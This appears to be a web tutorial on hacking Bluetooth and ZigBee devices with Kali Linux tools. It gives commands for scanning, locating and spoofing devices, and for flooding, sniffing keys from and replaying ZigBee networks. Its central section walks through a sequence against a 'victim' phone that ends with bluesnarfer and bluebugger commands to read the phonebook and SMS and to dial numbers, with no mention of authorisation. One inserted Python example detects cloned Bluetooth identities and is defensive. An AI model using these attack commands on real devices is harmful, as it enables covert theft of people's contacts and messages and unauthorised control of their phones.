Best Tools to Hack Bluetooth and Any Wireless Connection in Kali Linux

How to Hack Smartphone Bluetooth Using Kali Linux

List of tools to hack Bluetooth:


Blooover performs the Bluebug attack. If you intend to install the application, you should be using a phone that has the Java Bluetooth API implemented.


  • Reading phonebooks
  • Writing phonebook entries
  • Reading/decoding SMS stored on the device
  • Setting call forward
  • Initiating phone call


Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It is meant to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

Use the command below to log the details of nearby Bluetooth devices to a log file named btdevices.log:

bluelog -i hci0 -o /root/Desktop/btdevices.log -v

This command provides additional information, including the manufacturer, broadcast names and device class:

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log -v

BlueMaho: Bluetooth Hacker App

BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python, and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, the main thing to do, testing to find unknown vulns. It can also produce nice statistics.

BlueMaho is an integrated Bluetooth scanning/hacking tool. Here we will simply use it for scanning. You can start BlueMaho's elegant GUI by typing:

When you do, it opens a GUI. Here, I've clicked on "get SDP data" and hit the play button to the left. BlueMaho begins scanning for discoverable devices and, like the other tools, it finds two Bluetooth devices.

In the bottom window, BlueMaho displays more information from the scanned devices. I've copied that information and placed it into a text file to make it easier for you to read.

Note that it displays the name of the first device and then describes the device type as "Audio/Video, Headset profile." It then identifies the second device, and we are told its device type is "Phone, Smart phone."

Now that we know how to gather information on the Bluetooth devices in our range,


BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion.

Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):

root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8

Bluesnarfer

Bluesnarfer downloads the phone book of any mobile device vulnerable to Bluesnarfing. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data.

Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):

root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Mobile Bluetooth Using Bluesnarfer

Check the configuration

hciconfig hci0

Scan for victims

hcitool -i hci0 scan

Ping the victim device to see if the device is awake

l2ping <victim MAC addr>

Browse the victim for RFCOMM channels to connect to

sdptool browse --tree --l2cap <mac addr>

Then you can use bluesnarfer, for example, to read the victim's phonebook, dial a number, read SMS or other things

bluesnarfer -r 1-100 -C 7 -b <mac addr>

To see the available options

bluebugger -h

Dial a number

bluebugger -m <victim name> -c 7 -a <mac addr> dial <number>

Btscanner: Hack Bluetooth in Kali Linux

The Btscanner tool can capture information from a Bluetooth device without pairing. You can download Btscanner using this link. The setup is very small in size (only 1.05 MB) and easy to install. Btscanner searches for devices and shows them on the screen; if you want to see more information, just hit Enter and it will show the device's MAC address.

1. Start your Bluetooth with this command

Syntax: service bluetooth start

2. Now open btscanner with this command

Syntax: btscanner

Now you are here

3. Now see the instructions given below; in my case, press i and your scan starts

4. Now you will find the Bluetooth device list

5. Now select with the arrow keys and press Enter to get full information about the Bluetooth device.


RedFang is a small proof-of-concept application to find non-discoverable Bluetooth devices. This is done by brute forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().

Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):

root@kali:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning Bluetooth device information: Name, Class, and Address. Cloning this information effectively allows a Bluetooth device to hide in plain sight. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address).

Well, normally most of us never intend to audit the Bluetooth stack in any organization. But this tool could be interesting to use in an environment where Bluetooth devices have been paired with important hardware.

Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):

root@kali:~# spooftooph -i hci1 -a 00803789EE76
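
Repeated scan data can expose the side effects of this kind of cloning. The added example below (not part of the original article or of Spooftooph) flags an address whose advertised name or class changes between scans, and a name/class profile that shows up under more than one address. The observation tuples and function names are constructed for illustration; a clone that copies all three fields looks identical in this data and needs other signals, such as link quality or physical location.

```python
from collections import defaultdict

# Constructed inquiry-scan observations: (timestamp, address, name, class of device).
# All values are made up for illustration; they are not output from any tool above.
OBSERVATIONS = [
    ("2024-05-01T09:00:00", "00:11:22:33:44:55", "Conf-Room-Headset", "0x240404"),
    ("2024-05-01T09:00:00", "66:77:88:99:AA:BB", "Badge-Reader-2", "0x001f00"),
    ("2024-05-01T09:05:00", "00:11:22:33:44:55", "Conf-Room-Headset", "0x240404"),
    ("2024-05-01T09:10:00", "00:11:22:33:44:55", "Conf-Room-Headset", "0x5a020c"),
    ("2024-05-01T09:15:00", "CC:DD:EE:FF:00:11", "Badge-Reader-2", "0x001f00"),
]

def normalise(addr):
    """Canonical form so 00803789EE76 and 00:80:37:89:ee:76 compare equal."""
    hexdigits = addr.replace(":", "").replace("-", "").upper()
    if len(hexdigits) != 12 or any(c not in "0123456789ABCDEF" for c in hexdigits):
        raise ValueError(f"not a Bluetooth address: {addr!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))

def find_identity_conflicts(observations):
    """Return (addresses seen with >1 profile, profiles seen under >1 address)."""
    profiles_by_addr = defaultdict(set)
    addrs_by_profile = defaultdict(set)
    for _ts, addr, name, cod in observations:
        addr = normalise(addr)
        profile = (name, cod.lower())
        profiles_by_addr[addr].add(profile)
        addrs_by_profile[profile].add(addr)
    # An address whose name/class changed: possible clone, or a reconfigured device.
    changed = {a: sorted(p) for a, p in profiles_by_addr.items() if len(p) > 1}
    # One name/class pair under several addresses: possible partial clone.
    shared = {p: sorted(a) for p, a in addrs_by_profile.items() if len(a) > 1}
    return changed, shared

if __name__ == "__main__":
    changed, shared = find_identity_conflicts(OBSERVATIONS)
    for addr, profiles in changed.items():
        print(f"ALERT {addr} advertised {len(profiles)} different name/class profiles")
    for (name, cod), addrs in shared.items():
        print(f"ALERT profile {name!r}/{cod} seen under {', '.join(addrs)}")
```
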

Other Wireless Tools


Transmit a flood of associate requests to a target network.

zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float] 

zbassocflood -p 0xBAAD -c 11 -s 0.1


zbdsniff: Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files.

zbdsniff [capturefiles …]


zbdump: a tcpdump-like tool for ZigBee/IEEE 802.15.4 networks. Compatible with Wireshark 1.1.2 and later.

zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind provides a GTK-based GUI to the user which displays the results of a zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for a response, adding the response to a table as well as displaying signal strength on a gauge widget.


zbgoodfind: search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:

zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d generate binary file (test mode)]


zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files:

zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.